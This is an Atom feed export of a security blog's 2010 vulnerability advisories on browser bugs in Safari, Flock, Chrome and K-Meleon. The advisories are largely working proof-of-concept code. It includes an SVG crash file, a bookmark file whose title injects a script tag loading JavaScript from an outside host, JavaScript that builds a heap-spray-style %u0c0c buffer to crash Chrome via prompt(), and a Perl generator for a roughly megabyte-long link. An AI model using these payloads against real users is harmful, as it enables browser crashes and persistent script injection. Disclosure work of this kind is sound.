&amp;lt;svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1"&amp;gt;&lt;br /&gt;
&amp;lt;defs&amp;gt;&lt;br /&gt;
&amp;lt;mask id="crash"&amp;gt;&lt;br /&gt;
&amp;lt;polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074 &lt;br /&gt;
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074 &lt;br /&gt;
51,121.538 129.666,119.935"&lt;br /&gt;
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254) &lt;br /&gt;
translate(-52.381 -37.9218)"&lt;br /&gt;
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" /&amp;gt;&lt;br /&gt;
&amp;lt;/mask&amp;gt;&lt;br /&gt;
&amp;lt;/defs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;"&amp;gt; &lt;br /&gt;
&amp;lt;text x="80" y="80" style="font-size:111000000pt; fill:pink;"&amp;gt;Safari&amp;lt;/text&amp;gt;&lt;br /&gt;
&amp;lt;text x="0" y="130" style="font-size: 60pt; fill:pink;"&amp;gt;Now&amp;lt;/text&amp;gt;&lt;br /&gt;
&amp;lt;text x="20" y="190" style="font-size: 60pt; fill:pink;"&amp;gt;Crash&amp;lt;/text&amp;gt;&lt;br /&gt;
&amp;lt;/g&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/svg&amp;gt;&lt;br /&gt;
&lt;br /&gt;
###############EOF####################&lt;br /&gt;
&lt;br /&gt;
################# €nd ###############&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;Thnx To Climbo for his patience and support.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;Atentamente:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;Lostmon (lostmon@gmail.com)&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;Web-Blog: http://lostmon.blogspot.com/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;Google group: http://groups.google.com/group/lostmon (new)&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;--&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Verdana, sans-serif; font-size: 12px;"&gt;La curiosidad es lo que hace mover la mente....&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7504508647732643695?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xra4VTiF92rqEJXkK2HKy0kOBQ8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/mVpl5_3XevU" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7504508647732643695?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7504508647732643695?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/mVpl5_3XevU/safari-for-windows-invalid-sgv-text.html" title="Safari for windows Invalid SGV text style  Webkit.dll DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcFQnw8fip7ImA9Wx5REk4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-6259948782723399599</id><published>2010-08-19T16:50:00.005+02:00</published><updated>2010-08-19T17:00:13.276+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-19T17:00:13.276+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Flock Browser 3.0.0.3989 Malformed Bookmark XSS</title><content type="html">#########################################&lt;br /&gt;
Flock Browser 3.0.0.3989 Malformed Bookmark XSS&lt;br /&gt;
Vendor URL: http://beta.flock.com/&lt;br /&gt;
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html&lt;br /&gt;
Vendor notify:NO exploits availables:YES&lt;br /&gt;
#########################################&lt;br /&gt;
&lt;br /&gt;
Flock is faster, simpler, and more friendly. Literally. &lt;br /&gt;
It's the only sleek, modern web browser with the built-in &lt;br /&gt;
ability to keep you up-to-date with your Facebook and Twitter &lt;br /&gt;
friends.This browser version (3.0.0.3989) is based in a old&lt;br /&gt;
chromium project&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Flock has a flaw that allows Cross-site scripting style attacks&lt;br /&gt;
In bookmarks is has a Malformed bookmark title persistent xss&lt;br /&gt;
when inport from other browsers a malformed bookmark or when add&lt;br /&gt;
a new malformed bookmark or import a bookmark html file.&lt;br /&gt;
&lt;br /&gt;
###############################&lt;br /&gt;
Example Of Bookmark html file&lt;br /&gt;
###############################&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!DOCTYPE NETSCAPE-Bookmark-file-1&amp;gt;&lt;br /&gt;
&amp;lt;!-- This is an automatically generated file.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; It will be read and overwritten.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DO NOT EDIT! --&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"&amp;gt;&lt;br /&gt;
&amp;lt;TITLE&amp;gt;Bookmarks&amp;lt;/TITLE&amp;gt;&lt;br /&gt;
&amp;lt;H1&amp;gt;Menú Marcadores&amp;lt;/H1&amp;gt;&lt;br /&gt;
&amp;lt;DL&amp;gt;&amp;lt;p&amp;gt;&lt;br /&gt;
&amp;lt;DT&amp;gt;&amp;lt;A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638"&amp;gt;&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&amp;amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;/DL&amp;gt;&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#####################EOF##################&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;It is a persintent script insercion and when the user click in the menu for view&lt;br /&gt;
favorites page or access directly to favorites url&amp;nbsp; this make a "defacement" of this page and them the user can´t access to favorites :)&lt;br /&gt;
( Url of favorites =&amp;gt; chrome-extension://flock_people/favorites.html#p=1&amp;amp;v=all&amp;amp;o=0&amp;amp;s=title )&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;################# €nd #######################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6259948782723399599?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YctpX_PlonPI5PdmDN3Tv8xauz8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/u0qLRRRZtKQ" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6259948782723399599?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6259948782723399599?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/u0qLRRRZtKQ/flock-browser-3003989-malformed.html" title="Flock Browser 3.0.0.3989 Malformed Bookmark XSS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcDSXg6cCp7ImA9Wx5SGUQ.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-3377929688684036274</id><published>2010-08-16T22:17:00.002+02:00</published><updated>2010-08-16T22:21:18.618+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-16T22:21:18.618+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>Google Chrome and Chrome frame Prompt DoS</title><content type="html">###############################################&lt;br /&gt;
Google Chrome and Chrome frame Prompt DoS&lt;br /&gt;
Vendor URL: http://www.google.com&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html&lt;br /&gt;
Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html&lt;br /&gt;
Vendor notify: YES exploit available:YES&lt;br /&gt;
###############################################&lt;br /&gt;
&lt;br /&gt;
This Bug was discoveres by me and i have tested it&lt;br /&gt;
and investigate with Climbo From #ayuda-informaticos&lt;br /&gt;
on irc-hispano channel.&lt;br /&gt;
&lt;br /&gt;
#########&lt;br /&gt;
abstract &lt;br /&gt;
#########&lt;br /&gt;
&lt;br /&gt;
Some times the web aplications need to Prompt some data to users,&lt;br /&gt;
it can prompt via javascript code , or via html forms ...&lt;br /&gt;
&lt;br /&gt;
In the case of javascript prompts what´s happend if&lt;br /&gt;
the data to prompt ( the question) is very long ?¿&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
&lt;br /&gt;
Google chrome is prone vulnerable to a Denial of service&lt;br /&gt;
condition via "alert prompts" wen the data expected is very long ...&lt;br /&gt;
&lt;br /&gt;
i don´t know if this can be turn in a remote code execution or &lt;br /&gt;
memory corruption with some heap spray or similar but i think &lt;br /&gt;
that this need to be analyze &amp; patch &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
###################&lt;br /&gt;
Versions Tested&lt;br /&gt;
###################&lt;br /&gt;
&lt;br /&gt;
In all cases chrome is the vector to do&lt;br /&gt;
something in all systems :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
MAC OS X leopard 10.5&lt;br /&gt;
######################&lt;br /&gt;
&lt;br /&gt;
Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4&lt;br /&gt;
V8 2.1.10.15&lt;br /&gt;
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) &lt;br /&gt;
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4&lt;br /&gt;
Command Line   /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818&lt;br /&gt;
&lt;br /&gt;
In all cases OS X closes all Chrome Windows.( Chrome Crash)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
##############&lt;br /&gt;
ubuntu 10.04&lt;br /&gt;
##############&lt;br /&gt;
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04&lt;br /&gt;
WebKit 533.4 &lt;br /&gt;
V8 2.1.10.14&lt;br /&gt;
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 &lt;br /&gt;
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4&lt;br /&gt;
Command Line /usr/lib/chromium-browser/chromium-browser&lt;br /&gt;
&lt;br /&gt;
In al cases Chrome is minimized and denies the access to &lt;br /&gt;
"window manager button" and we can´t no change beetwen applications&lt;br /&gt;
that we have open.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
##################&lt;br /&gt;
Windows 7 32 bits&lt;br /&gt;
###################&lt;br /&gt;
&lt;br /&gt;
Google Chrome 5.0.375.86 (Build oficial 49890)&lt;br /&gt;
on windows 7 ultimate fully patched.&lt;br /&gt;
&lt;br /&gt;
It causes a DoS in chrome and a DoS in IE8 when &lt;br /&gt;
exploit it across Google Chrome Frame.&lt;br /&gt;
&lt;br /&gt;
###############&lt;br /&gt;
Debian 2.6.26&lt;br /&gt;
###############&lt;br /&gt;
&lt;br /&gt;
Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3&lt;br /&gt;
V82.2.24.11&lt;br /&gt;
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3&lt;br /&gt;
&lt;br /&gt;
in all cases Debian Closes all chrome Windows.( Chrome Crash)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
####################&lt;br /&gt;
Proof Of Concepts&lt;br /&gt;
####################&lt;br /&gt;
&lt;br /&gt;
this PoC is for testing in win7 32 bits, chrome &lt;br /&gt;
and chrome frame in conjuncion with ie8 that causes &lt;br /&gt;
a DoS in ie8 &lt;br /&gt;
&lt;br /&gt;
#############################&lt;br /&gt;
&amp;lt;meta http-equiv="X-UA-Compatible" content="chrome=1"&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt; wait 10 or 11 seconds :)&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
function do_buffer(payload, len) {&lt;br /&gt;
while(payload.length &amp;lt; (len * 2)) payload += payload;&lt;br /&gt;
payload = payload.substring(0, len);&lt;br /&gt;
return payload;&lt;br /&gt;
}&lt;br /&gt;
function DoS()&lt;br /&gt;
{&lt;br /&gt;
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);&lt;br /&gt;
prompt(buffer);&lt;br /&gt;
}&lt;br /&gt;
setTimeout('DoS()',1000);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
################# EOF ###################&lt;br /&gt;
&lt;br /&gt;
This second PoC is for test in Linux or in Mac OS X&lt;br /&gt;
&lt;br /&gt;
#######################################&lt;br /&gt;
&amp;lt;h1&amp;gt; wait 10 or 11 seconds :)&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
function do_buffer(payload, len) {&lt;br /&gt;
while(payload.length &amp;lt; (len * 2)) payload += payload;&lt;br /&gt;
payload = payload.substring(0, len);&lt;br /&gt;
return payload;&lt;br /&gt;
}&lt;br /&gt;
function DoS()&lt;br /&gt;
{&lt;br /&gt;
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);&lt;br /&gt;
prompt(buffer);&lt;br /&gt;
}&lt;br /&gt;
setTimeout('DoS()',1000);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
################# EOF ###################&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
References&lt;br /&gt;
############&lt;br /&gt;
related vuln:&lt;br /&gt;
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html&lt;br /&gt;
&lt;br /&gt;
Google chrome bugtrack:&lt;br /&gt;
http://code.google.com/p/chromium/issues/detail?id=47617&lt;br /&gt;
&lt;br /&gt;
################### €nd ###################&lt;br /&gt;
&lt;br /&gt;
Thnx To Climbo for his patience and support.&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-3377929688684036274?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rUMFSxE-mfIzo7thDBW8tvptUyw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/lqp_KrXqA_A" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/3377929688684036274?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/3377929688684036274?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/lqp_KrXqA_A/google-chrome-and-chrome-frame-prompt.html" title="Google Chrome and Chrome frame Prompt DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEUMSXYyeyp7ImA9Wx5TGU4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-3620986120176065323</id><published>2010-08-04T17:35:00.002+02:00</published><updated>2010-08-04T17:38:08.893+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-04T17:38:08.893+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>Safari for windows Long link DoS</title><content type="html">############################################&lt;br /&gt;
Safari for windows Long link DoS&lt;br /&gt;
Vendor URL:http://www.apple.com/safari/&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html&lt;br /&gt;
Vendor notified:Yes   exploit available: YES&lt;br /&gt;
############################################&lt;br /&gt;
&lt;br /&gt;
Safari is prone vulnerable to Dos with a very long Link...&lt;br /&gt;
This issue is exploitable via web links like &amp;lt;a href="very long URL"&amp;gt;&lt;br /&gt;
click here&amp;lt;/a&amp;gt; or similar vectors. Safari fails to render the link &lt;br /&gt;
and it turn Frozen resulting in a Denial of service  condition.&lt;br /&gt;
&lt;br /&gt;
#################&lt;br /&gt;
Versions Tested&lt;br /&gt;
#################&lt;br /&gt;
&lt;br /&gt;
I have tested this issue in win xp sp3 and a windows 7 fully pached.&lt;br /&gt;
&lt;br /&gt;
Win XP sp3:&lt;br /&gt;
&lt;br /&gt;
Safari 5.0.X vulnerable&lt;br /&gt;
Safari 4.xx vulnerable &lt;br /&gt;
&lt;br /&gt;
windows 7 Ultimate:&lt;br /&gt;
&lt;br /&gt;
Safari 5.0.X vulnerable&lt;br /&gt;
Safari 4.xx vulnerable &lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
References&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Discovered: 29-07-2010&lt;br /&gt;
vendor notify:31-07-2010&lt;br /&gt;
Vendor Response:&lt;br /&gt;
Vendor patch:&lt;br /&gt;
&lt;br /&gt;
####################&lt;br /&gt;
Proof Of Concept&lt;br /&gt;
####################&lt;br /&gt;
&lt;br /&gt;
#######################################################################&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
# safari &amp; k-meleon Long "a href" Link DoS&lt;br /&gt;
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com&lt;br /&gt;
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS&lt;br /&gt;
# generate the file open it with safari wait a seconds&lt;br /&gt;
######################################################################&lt;br /&gt;
&lt;br /&gt;
$archivo = $ARGV[0];&lt;br /&gt;
if(!defined($archivo))&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
print "Usage: $0 &amp;lt;archivo.html&amp;gt;\n";&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
$cabecera = "&amp;lt;html&amp;gt;" . "\n";&lt;br /&gt;
$payload = "&amp;lt;a href=\"about:neterror?e=connectionFailure&amp;c=" . "/" x 1028135 . "\"&gt;click here if you can :)&amp;lt;/a&amp;gt;" . "\n";&lt;br /&gt;
$fin = "&amp;lt;/html&amp;gt;";&lt;br /&gt;
&lt;br /&gt;
$datos = $cabecera . $payload . $fin;&lt;br /&gt;
&lt;br /&gt;
open(FILE, '&amp;lt;' . $archivo);&lt;br /&gt;
print FILE $datos;&lt;br /&gt;
close(FILE);&lt;br /&gt;
&lt;br /&gt;
exit;&lt;br /&gt;
&lt;br /&gt;
################## EOF ######################&lt;br /&gt;
&lt;br /&gt;
##############&lt;br /&gt;
Related Links&lt;br /&gt;
##############&lt;br /&gt;
&lt;br /&gt;
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251&lt;br /&gt;
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474&lt;br /&gt;
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776&lt;br /&gt;
&lt;br /&gt;
###################### €nd #############################&lt;br /&gt;
&lt;br /&gt;
Thnx to Phreak for support and let me undestanding the nature of this bug&lt;br /&gt;
thnx to jajoni for test it in windows 7 X64 bits version.&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-3620986120176065323?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ZFPkTAiHvgTehQ9TvgVFJ4tlyYw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/7Zs_ZEMnrBM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/3620986120176065323?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/3620986120176065323?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/7Zs_ZEMnrBM/safari-for-windows-long-link-dos.html" title="Safari for windows Long link DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0MFSHk_eyp7ImA9Wx5TGU4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-1575278226327104105</id><published>2010-08-04T17:18:00.002+02:00</published><updated>2010-08-04T17:23:39.743+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-04T17:23:39.743+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>K-Meleon for windows about:neterror Stack Overflow DoS</title><content type="html">############################################&lt;br /&gt;
K-Meleon for windows about:neterror Stack Overflow DoS&lt;br /&gt;
Vendor URL:http://kmeleon.sourceforge.net/&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html&lt;br /&gt;
Vendor notified:Yes   exploit available: YES&lt;br /&gt;
############################################&lt;br /&gt;
&lt;br /&gt;
K-Meleon is an extremely fast, customizable, lightweight web browser&lt;br /&gt;
based on the Gecko layout engine developed by Mozilla which is also &lt;br /&gt;
used by Firefox. K-Meleon is free, open source software released under&lt;br /&gt;
the GNU General Public License and is designed specifically for &lt;br /&gt;
Microsoft Windows (Win32) operating systems.&lt;br /&gt;
&lt;br /&gt;
K-Meleon is prone vulnerable to crashing with a very long URL...&lt;br /&gt;
Internal web pages like about:neterror does not limit the amount of &lt;br /&gt;
chars that a user put in 'c' 'd' params and them if we compose a &lt;br /&gt;
malformed url the browser can be chash easy.This issue is exploitable&lt;br /&gt;
via web links like &lt;a href="http://www.blogger.com/very%20long%20URL"&gt;click here&lt;/a&gt; or via &lt;br /&gt;
window.location.replace('very long url') or similar vectors.&lt;br /&gt;
&lt;br /&gt;
#################&lt;br /&gt;
